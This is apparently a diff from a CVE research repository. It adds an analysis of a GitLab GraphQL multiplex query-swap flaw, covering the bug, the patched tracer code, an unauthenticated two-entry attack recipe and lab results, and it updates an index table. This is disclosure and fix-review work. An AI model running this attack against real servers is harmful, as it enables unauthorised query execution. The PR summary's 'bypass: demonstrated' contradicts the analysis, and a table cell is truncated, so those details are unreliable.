+original back in so the missing fields can resolve to a nil fallback
+(`FutureFieldFallback#get_field` returns a synthetic field when
+`context[:contain_future_fields]` is set).
+
+## The bug
+
+The tracer instance is shared across every entry of a multiplex, and its state
+is two flat instance variables. graphql-ruby parses all multiplex entries up
+front, then executes them in order:
+
+1. Parse entry[0] → `@original_query_document` = doc0, `@contain_future_fields` = false
+2. Parse entry[1] (contains an `@gl_introduced` future field) →
+   `@original_query_document` = doc1, `@contain_future_fields` = true
+3. Execute entry[0] → flag is true → entry[0]'s `@document` is replaced with
+   **doc1**, `prepare_ast` re-runs → **entry[0] executes entry[1]'s document**
+   with entry[0]'s variables and operation context.
+
+The attacker fully controls doc1. The response slot, variables, and any
+request-level handling belong to entry[0], but the executed GraphQL — the
+"generated code" — comes from entry[1]. That is the CWE-94 injection: a
+remotely supplied document is substituted into another query's execution.
+
+## Companion flaw (fixed in the same release)
+
+`FutureFieldFallback.fallback_field` built the synthetic field with
+`fallback_value: nil`. Under graphql-ruby, when the underlying object actually
+responds to the missing method, the method was still invoked despite the
+fallback value ("Prevent calling object method when resolving fallback field",
+`e283c6ad`). The fix introduces `Resolvers::NilResolver`, whose `resolve`
+unconditionally returns nil, and the new request spec asserts the object method
+is never called. This matters because a future-gated field whose resolver
+method already exists in the deployed code would execute real application logic
+that the schema deliberately hides.
+
+## The fix (v19.2.4-ee)
+
+`IntroducedTracer` now keys its state by the parsed document object:
+
+```ruby
+def initialize(...)
+  @introduced_tracer_data = {}
+  super
+end
+
+def parse(query_string:)
+  original_document = super
+  filter = ...FutureFieldFilter.new(original_document.dup)
+  filtered_document = filter.visit
+  @introduced_tracer_data[filtered_document] = {
+    original_document: original_document,
+    contain_future_fields: filter.contain_future_fields
+  }
+  filtered_document
+end
+
+def execute_query(query:)
+  doc_data = @introduced_tracer_data[query.document]
+  if doc_data && doc_data[:contain_future_fields]
+    query.instance_variable_set(:@document, doc_data[:original_document])
+    query.send(:prepare_ast)
+    query.context[:contain_future_fields] = doc_data[:contain_future_fields]
+  end
+  super
+end
+```
+
+Each query can now only ever be swapped back to its OWN original document, and
+only when it genuinely contained future fields. Cross-entry document
+substitution is impossible.
+
+## Attacker reachability (to be confirmed in lab)
+
+- Unauthenticated multiplex against `/api/graphql` on a default install.
+- entry[0]: a valid benign query (e.g. `echo(text: $text)` with variables).
+- entry[1]: document containing `futureField @gl_introduced(version: "<server+1>")`
+  plus attacker-chosen operations.
+- Vulnerable expected: entry[0]'s response reflects doc1 execution (swap).
+- Fixed expected: each entry executes its own document.
+- Vendor-stated deeper impact (modify/delete public projects and user data)
+  applies "under certain conditions" — dependent on what operations are
+  abusable through the swapped document; the lab validates the injection
+  primitive first and then probes the impact boundary.
+
+## Lab confirmation (cve-poc-validation, 2026-08-18)
+
+[VERIFIED IN LAB] Against `gitlab/gitlab-ce:19.2.2-ce.0` an anonymous 2-entry
+multiplex returned the attacker document's output in entry[0]'s slot
+(`"nil says: INJECTED-BY-DOC1"` instead of the entry's own variable-driven
+string), and a 3-entry multiplex returned the attacker document's output in ALL
+three slots. A mutation embedded in the injected document executed (its effect
+was nullified by anonymous runtime authorization). Against
+`gitlab/gitlab-ce:19.2.4-ce.0` with a future version valid for both builds
+(19.2.5), every entry executed its own document and the legitimate per-entry
+future-field fallback still resolved to `futureField: null` — the fix removes
+the swap without breaking the feature. Mismatched operation names during the
+swap surface as `NoMethodError: undefined method 'operation_type' for nil` with
+`introduced_tracer.rb:27` in the backtrace (observed in server logs), because
+the victim entry's memoized operation name is resolved against the injected
+document.
+
+## Fix assessment
+
+The keyed-by-document tracer state fully restores the invariant "a query
+executes only its own document": three fixed-build bypass attempts (3-entry
+multiplex, explicit operationName, embedded mutation) all failed, and the
+companion `NilResolver` change removes method invocation from the fallback
+path. No sibling tracer in the fixed build caches query documents in shared
+instance variables. Fix assessed as sufficient within the bounded BVA scope.

--- a/README.md
+++ b/README.md
@@ -110,6 +110,7 @@ environment that you own or are explicitly authorized to test.
 | [CVE&#8209;2026&#8209;53488](CVE-2026-53488/) | **containerd CRI plugin**<br>Image LABEL Host Command Execution | **9.4** |
 | [CVE&#8209;2026&#8209;63221](CVE-2026-63221/) | **CodeIgniter4 Query Builder `deleteBatch()`**<br>CodeIgniter4 deleteBatch() SQL Injection | **9.4** |
 | [CVE&#8209;2026&#8209;50561](CVE-2026-50561/) | **xerrors Yuxi**<br>Yuxi JWT Authentication Bypass<br><br>**Bypass / fix review:** v0.6.2 fix sufficient; no bypass or sibling variant found | **9.4** |
+| [CVE&#8209;2026&#8209;19478](CVE-2026-19478/) | **GitLab CE/EE GraphQL API**<br>GitLab GraphQL Multiplex Query Swap (Unauthenticated Code Injection)<br><br>**Bypass / fix review:** Disclosure basis: this analysis covers ONLY the already-patched, already-disclosed | **9.4** |
 | [CVE&#8209;2026&#8209;55971](CVE-2026-55971/) | **Apache Thrift**<br>Pre-Auth ZLIB Heap Buffer Overflow Write | **9.3** |
 | [CVE&#8209;2026&#8209;65520](CVE-2026-65520/) | **miniOrange WP OAuth Server**<br><= 6.2.0 SQL Injection | **9.3** |
 | [CVE&#8209;2026&#8209;66659](CVE-2026-66659/) | **Tablesome Table**<br>Authenticated Blind SQL Injection | **9.3** |
@@ -169,7 +170,7 @@ environment that you own or are explicitly authorized to test.
 | [CVE&#8209;2026&#8209;35414](CVE-2026-35414/) | **OpenSSH**<br>Certificate Principal Matching Authentication Bypass | **N/A** |
 | [CVE&#8209;2025&#8209;59060](CVE-2025-59060/) | **Apache Ranger**<br>Apache Ranger TLS Hostname Verification Bypass | **N/A** |
 
-25 of the 132 indexed packages record a bypass or incomplete-fix finding.
+26 of the 134 indexed packages record a bypass or incomplete-fix finding.
 
 ## Typical package layout
 


### PR DESCRIPTION
Pipeline-staged publish package for CVE-2026-19478.

- GitLab CE/EE GraphQL API — GitLab GraphQL Multiplex Query Swap (Unauthenticated Code Injection)
- CVSS 9.4; bypass: demonstrated, bypass_analysis.md included
- Audit: exit contract + package sweep clean at publish time

Published via the pipeline UI publish gate.